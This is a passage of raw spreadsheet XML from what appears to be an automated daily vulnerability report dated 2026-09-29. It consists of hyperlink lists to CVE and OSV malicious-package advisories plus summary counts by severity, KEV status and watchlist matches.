TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GO-2026-6538" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17218" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17222" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17206" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17210" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17216" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17217" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17213" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17214" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17215" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17223" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17224" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17225" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17226" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17227" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17228" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17229" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17230" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17231" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17232" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17233" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17234" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17235" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17236" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17237" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17238" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17239" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17240" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88771" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88772" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88773" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88775" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88776" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88777" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101090" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100872" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101060" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101064" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88778" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88774" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101085" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101063" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100874" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100875" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100889" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100890" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100895" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100901" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100909" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100868" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100904" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101046" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100877" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100878" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100883" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100884" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100887" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100898" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100899" TargetMode="External" Id="rId273" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet9.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101910" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101914" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101913" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100701" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101062" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101895" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10601" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12249" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19032" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32599" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42127" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42129" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5139" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58197" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6062" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61554" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61628" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61629" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61630" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61672" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61682" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61687" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61709" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61794" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61795" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61833" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61834" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63199" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63405" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63406" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63445" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63458" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6673" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68497" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71485" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77310" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77339" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8074" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81505" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81871" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82399" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83557" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84292" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84394" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85024" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86003" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86043" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87859" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88058" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88932" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9029" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9162" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17220" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-456v-xq2p-r4cj" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17212" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17204" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17205" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17207" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17221" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17219" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GO-2026-6538" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17218" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17222" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17206" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17210" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17216" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17217" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17213" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17214" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17215" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17223" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17224" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17225" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17226" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17227" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17228" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17229" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17230" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17231" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17232" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17233" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17234" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17235" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17236" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17237" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17238" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17239" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17240" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101090" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101064" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101063" TargetMode="External" Id="rId91" /></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8" customWidth="1" min="1" max="1"/>
    <col width="85" customWidth="1" min="2" max="2"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>Daily Vulnerability Report</t>
        </is>
      </c>
      <c r="B1" t="inlineStr"/>
    </row>
    <row r="2">
      <c r="A2" s="2" t="inlineStr">
        <is>
          <t>Report date</t>
        </is>
      </c>
      <c r="B2" s="3" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-09-28T06:15 to 2026-09-29T06:15</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-09-29 06:16:26 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total entries</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>465</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  New - published today</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>409</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Significant updates</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>56</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Added to CISA KEV</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>47</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>126</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>161</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B14" s="3" t="n">
        <v>36</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Unscored</t>
        </is>
      </c>
      <c r="B15" s="3" t="n">
        <v>101</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B16" s="3" t="n">
        <v>273</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>From GitHub Advisories</t>
        </is>
      </c>
      <c r="B17" s="3" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="18">
